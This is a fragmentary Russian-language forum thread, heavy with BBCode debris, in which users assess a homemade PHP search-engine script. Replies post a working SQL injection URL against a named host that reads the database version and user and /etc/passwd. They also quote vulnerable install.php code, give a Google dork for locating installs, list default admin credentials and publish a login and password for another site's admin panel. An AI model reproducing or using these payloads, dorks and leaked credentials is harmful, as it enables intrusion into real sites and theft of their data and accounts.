народ мне нужно ваше мнение стоит ли использовать вот http://magicsearch.pp.ua cms вот ДЕМО ой сори эт наверно не cms а скрипт

По ссылке даже не переходил, но уже одно то, что сайт на фришном домене, дает как минимум 50%, что это какая-то хренатень.

А там написано скрипт поисковой ситемы) причем тут CMS

Oops..

Need: magic_quotes =Off

install.php

[PHP]
[COLOR="#000000"][...]

if(isset($_POST['go_ed'])) {

if (!is_writable("settings/database.php")) {

print "Файла database.php несуществует или незаданы права доступа 666";

} else {

$fhandle=fopen("settings/database.php","w");

fwrite($fhandle,"[COLOR="#0000BB"]

http://23rus.sytes.net/static.php?str='+and+1=2+union+select+1,2,concat_w s(0x3a,version(),user(),database()),LOAD_FILE('/etc/passwd')+--+

Сноси в общем.

Код писала курица.

p.s. не юзай юзера root. у него FILE_PRIV как минимум включен, и имеет он доступ ко всем базам данных.

на многих сайтах логин/пароль - moders

админка - /admin/

Google Dork:"Created by Kiria-Studio"

http://search.afu-time.com/admin/index.php - sorokin96:25101996 (не тот ли это кирил - разработчик? )

да эт я чуток попутал

[QUOTE="Boolean"]
Oops..
Need: magic_quotes =Off
install.php
[PHP]
[COLOR="#000000"][...]

if(isset($_POST['go_ed'])) {

if (!is_writable("settings/database.php")) {

print "Файла database.php несуществует или незаданы права доступа 666";

} else {

$fhandle=fopen("settings/database.php","w");

fwrite($fhandle,"[COLOR="#0000BB"]Файла database.php несуществует или незаданы права досту па 666";

} else {

$fhandle=fopen("settings/database.php","w");

fwrite($fhandle,"[COLOR="#0000BB"]

ясен хрен он фришный я же на своем компе сайт повесил

всмысле на своем компе? на сервере?